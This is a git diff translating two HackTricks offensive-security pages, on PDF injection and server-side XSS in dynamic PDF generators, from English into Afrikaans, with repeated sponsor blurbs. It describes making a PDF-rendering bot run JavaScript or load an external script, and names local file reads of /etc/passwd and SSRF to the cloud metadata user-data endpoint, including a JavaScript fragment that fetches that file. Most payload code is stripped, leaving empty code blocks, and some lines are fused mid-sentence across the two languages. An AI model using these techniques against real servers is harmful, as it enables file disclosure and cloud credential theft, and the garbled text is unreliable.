-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 
-**If your input is being reflected inside a PDF file, you can try to inject PDF data to execute JavaScript or steal the PDF content.**
+**As jou inset in 'n PDF-lêer weerspieël word, kan jy probeer om PDF-data in te spuit om JavaScript uit te voer of die PDF-inhoud te steel.**
 
-Chec the post: [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)
+Kyk na die pos: [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)
 
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

-
-
diff --git a/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md b/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
index 7c72c7862..22a5826d3 100644
--- a/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
+++ b/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
@@ -1,40 +1,39 @@
-# Server Side XSS (Dynamic PDF)
+# Serverkant XSS (Dinamiese PDF)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## Server Side XSS (Dynamic PDF)
+## Serverkant XSS (Dinamiese PDF)
 
-If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.\
-So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.
+As 'n webbladsy 'n PDF skep deur gebruikersbeheerde insette te gebruik, kan jy probeer om die bot wat die PDF skep, te **verneuk om willekeurige JS-kode uit te voer**.\
+Dus, as die **PDF-skepper-bot** sekere soorte **HTML-etikette vind**, sal dit hulle **interpreteer**, en jy kan hierdie gedrag **misbruik** om 'n **Server XSS** te veroorsaak.
 
-Please, notice that the `` tags don't work always, so you will need a different method to execute JS (for example, abusing `` etikette nie altyd werk nie, so jy sal 'n ander metode nodig hê om JS uit te voer (byvoorbeeld deur `
 
@@ -47,64 +46,56 @@ Also, note that in a regular exploitation you will be **able to see/download the
 
 
 ```
-
 ### SVG
 
-Any of the previous of following payloads may be used inside this SVG payload. One iframe accessing Burpcollab subdomain and another one accessing the metadata endpoint are put as examples.
-
+Enige van die vorige of volgende payloads kan binne hierdie SVG payload gebruik word. Een iframe wat toegang tot die Burpcollab subdomein verkry en 'n ander wat toegang tot die metadata-eindpunt verkry, word as voorbeelde gegee.
 ```markup
 
-    
-        
-            
-                
-                
-            
-        
-    
+
+
+
+
+
+
+
+
 
 
 
 
-  
-  
+xmlns="http://www.w3.org/2000/svg">
+
+
 
 ```
+Jy kan baie **ander SVG-ladingstukke** vind in [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
 
-You can find a lot **other SVG payloads** in [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
-
-### Path disclosure
-
+### Pad-onthulling
 ```markup
 
 
 
 ```
+### Laai 'n eksterne skrip
 
-### Load an external script
-
-The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time.
-
+Die beste manier om hierdie kwesbaarheid uit te buit, is om die kwesbaarheid te misbruik om die bot 'n skrip te laat laai wat jy plaaslik beheer. Dan sal jy in staat wees om die payload plaaslik te verander en die bot dit elke keer met dieselfde kode te laat laai.
 ```markup
 
 ')"/>
 ```
-
-### Read local file / SSRF
+### Lees plaaslike lêer / SSRF
 
 {% hint style="warning" %}
-Change `file:///etc/passwd` for `http://169.254.169.254/latest/user-data` for example to **try to access an external web page (SSRF)**.
+Verander `file:///etc/passwd` na `http://169.254.169.254/latest/user-data` byvoorbeeld om **te probeer om 'n eksterne webblad (SSRF) te bereik**.
 
-If SSRF is allowed, but you **cannot reach** an interesting domain or IP, [check this page for potential bypasses](../ssrf-server-side-request-forgery/url-format-bypass.md).
+As SSRF toegelaat word, maar jy **nie 'n interessante domein of IP kan bereik nie**, [kyk na hierdie bladsy vir potensiële omseilings](../ssrf-server-side-request-forgery/url-format-bypass.md).
 {% endhint %}
-
 ```markup
 
 ```
 
@@ -130,7 +121,7 @@ x.open("GET","file:///etc/passwd");x.send();
 
 
 
-